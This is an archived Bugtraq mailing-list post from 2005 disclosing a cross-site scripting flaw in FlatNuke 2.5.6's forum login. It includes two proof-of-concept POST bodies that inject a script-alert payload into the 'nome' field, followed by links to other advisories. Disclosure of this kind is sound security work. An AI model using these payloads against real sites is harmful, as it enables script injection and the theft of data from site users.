Flat Nuke Cross Site Scripting

alex_at_aleksanet.com
Date: 10/24/05

Next message: iDEFENSE Labs: "iDEFENSE Security Advisory 10.24.05: SCO Openserver backupsh 'Home' Buffer Overflow Vulnerability"

Previous message: papipsycho_at_hotmail.com: "Nuked klan 1.7: SQL vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 24 Oct 2005 00:05:45 -0000
To: bugtraq@securityfocus.com

('binary' encoding is not supported, stored as-is) Web Site:

Vulnerable: FlatNuke <= 2.5.6

This script is possibly vulnerable to Cross Site Scripting (XSS) attacks

Malicious users may inject JavaScript, VBScript, ActiveX, into a vulnerable application to fool a user in order to gather data from them.

Affects http://[target]TEST/flatnuke-2.5.6/forum/index.php

The script has been tested with these POST variables:

op=login&nome=<script>alert('LOL');</script>&regpass=1&reregpass=1&anag=1&email=1&homep=http%3A%2F%2F&prof=1&prov=1&ava=1&url_avatar=1&firma=1

op=login&from=home&nome=<script>alert('LOL');</script>&logpassword=1

Best Regards
Alex

Next message: iDEFENSE Labs: "iDEFENSE Security Advisory 10.24.05: SCO Openserver backupsh 'Home' Buffer Overflow Vulnerability"

Previous message: papipsycho_at_hotmail.com: "Nuked klan 1.7: SQL vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[scip_Advisory 1746] Microsoft Internet Explorer 6.0 embedded content cross site scripting
... Microsoft Internet Explorer 6.0 embedded content cross site scripting ... Therefore embedding script code in the latter may be possible. ... They could de-activate all upload and embedding (e.g. BBcode or HTML ...
(Bugtraq)
[Full-disclosure] [scip_Advisory 1746] Microsoft Internet Explorer 6.0 embedded content cross site s
... Microsoft Internet Explorer 6.0 embedded content cross site scripting ... Therefore embedding script code in the latter may be possible. ... They could de-activate all upload and embedding (e.g. BBcode or HTML ...
(Full-Disclosure)
Multiple Vulnerabilities in WebCalendar
... WebCalendar - Web Calendar Application ... doesn't check <img src based attacks. ... Almost any GLOBAL parameter in this script ... You can try the vulnerability ...
(Bugtraq)
Re: Some new SSH exploit script?
... and write a script that outputs the log - without the script kiddies if it really bothers you. ... The solution to the real problem can neither be moving the door nor ... are not attacks on port 22/tcp. ...
(Pen-Test)
Re: ssd attacks; worm? and precautionary steps
... That particular script, it appears is not intelligent at all. ... (I did however report the bastard ... I did the following and don't worry about ssh attacks anymore: ...
(comp.os.linux.security)